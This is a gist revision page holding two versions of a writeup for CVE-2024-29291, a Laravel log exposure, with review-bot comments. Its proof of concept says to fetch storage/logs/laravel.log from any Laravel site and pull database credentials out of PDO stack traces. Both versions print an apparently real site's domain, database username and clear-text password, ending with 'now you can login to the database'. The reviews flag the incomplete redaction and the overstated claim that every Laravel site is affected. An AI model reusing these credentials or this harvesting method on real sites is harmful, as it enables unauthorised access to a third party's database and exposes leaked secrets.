Revisions
whiteman007 revised this gist
Apr 11, 2024 . 1 changed file with 31 additions and 12 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,52 +1,71 @@ CVE-ID: CVE-2024-29291 Description: A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials. Additional Information: None. Risk: High. Vulnerability Type: Database credential leak vulnerability. Vendor of Product: Laravel Framework. Affected Product Code Base: Laravel FRAMEWORK - 8.* - 11.* Affected Component: laravel.log. Attack Type: Remote. Impact Information Disclosure: True. Attack Vectors: Database credential leak vulnerability. Description: Access to private Database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved. Proof of concept: Go to any Laravel-based website and navigate to storage/logs/laravel.log. Open the file and search for "PDO->__construct('mysql:host=". The result: shell Copy code #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) #1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) Credentials: Username: u429384055_jscv Password: Jaly$$a0p0p0p0 Host: sql1... Now you can login to the database. By: Huseein Amer Facebook: https://www.facebook.com/hussein.amer.75491/ -
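Review bot: The revised first "Description:" attributes the leak to the Laravel Framework itself, but the proof-of-concept step "navigate to storage/logs/laravel.log" only works when that path is served over HTTP, and the trace paths show `vendor/laravel/framework` sitting under `public_html`, so the whole project root is acting as the document root here. State that precondition in the description, and add the remediation a reader needs: point the web server at the `public/` directory only, deny web access to `storage/`, and rotate any database password that has appeared in a log. The second "Description:" field is circular (access to credentials "by logging into the website database"), and "Attack Vectors:" repeats the vulnerability type instead of naming the request that retrieves the file; both should be rewritten. The example URL was dropped in this revision, but the domain is still readable in the stack-trace paths and the "Credentials:" block is unchanged, so the redaction is incomplete.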
whiteman007 created this gist
Mar 28, 2024
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,52 @@ CVE-ID: CVE-2024-29291 Suggested Description: An issue in Laravel Framework v8.* through v11.* allows a remote attacker to obtain sensitive information via the laravel.log component. Additional Information: None. Risk: High Vulnerability Type: Database credential leak vulnerability. Vendor of Product: Laravel Framework. Affected Product Code Base: Laravel FRAMEWORK - 8.* - 11.* Affected Component: laravel.log Attack Type: Remote. Impact Information Disclosure: True. Attack Vectors: Database credential leak vulnerability. Description: You can access private Database credential data by logging into the website database. Proof of concept: Go to any Laravel-based website and navigate to storage/logs/laravel.log. Example: https://js-cvdocs.online/storage/logs/laravel.log Open the file and search for "PDO->__construct('mysql:host=". The result: shell Copy code #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) #1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) Credentials: Username: u429384055_jscv Password: Jaly$$a0p0p0p0 Host: sql1... now you can login to database by:Huseein Amer face:https://www.facebook.com/hussein.amer.75491/
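Review bot: The "Example:" line names a live third-party site, and the stack trace plus the "Credentials:" block repeat that site's database account name and password in clear text; replace the domain, account name and password with placeholders such as `example.test`, `<db_user>` and `<db_password>` before publishing. "Go to any Laravel-based website" also overstates the reach: the quoted frames come from a logged exception trace through `Connector.php`, so the `PDO->__construct(...)` arguments are present only where a database connection failure was written to the log with its trace and the log file is reachable from the web. Say so in the proof of concept, and note under "Affected Component:" that the file lives in `storage/logs/`, which is the path the reader has to check on their own deployment.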